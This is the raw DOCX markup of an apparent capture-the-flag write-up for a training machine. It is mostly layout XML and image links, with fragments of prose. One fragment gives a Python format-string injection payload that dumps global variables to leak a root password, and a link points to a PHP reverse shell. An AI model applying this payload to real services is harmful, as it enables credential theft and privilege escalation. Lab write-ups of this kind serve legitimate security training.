        <w:t xml:space="preserve">. This file is used by the Python script. If we modify this file, the script returns an error.</w:t>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51300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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49700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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objects can access many internal attributes, including a dictionary of global variables. By abusing this, we can extract information by printing all global variables used by the file.</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{"ips":["{ip.list_blocked.__globals__}"]}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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24300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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6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obtain a variable called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root_secret</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains the root user’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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this password, we switch to the root user and retrieve the final flag from the root directory.</w:t>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53"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1">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="14"/>
    <w:bookmarkEnd w:id="1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0" name="image2.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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72">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73">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6" name="image3.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.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Biscuit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8.png"/><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image" Target="media/image28.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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netsparker.com/blog/web-security/format-string-vulnerabilities/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/32"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1.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.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7OIK8Gix1lpMrJTFTQJpl151Q==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjMwdDExdTExdjQ3ZjIOaC41aW9nM3Zua2dhNHYyDmgueTYxdHZpejh4bm9pMg5oLmZicHdwMjE0ajJscDIOaC40aDFzOXF6Nm9jY2kyDmguczFoNzM3cDAxNXhnMg5oLjFydmJnZnowa2c3cDIOaC5ycHgxbWx5bWd4aWQyDmguNnFsdjA2Y2dkenVmMg5oLnkxNjZwNDI5NHk2dzIOaC4xNzVmNWNzOTR6MG84AHIhMUQ3QnpQbzhrUUt4WXBPUFpWTmMtZ0I5bGJXV1kzXz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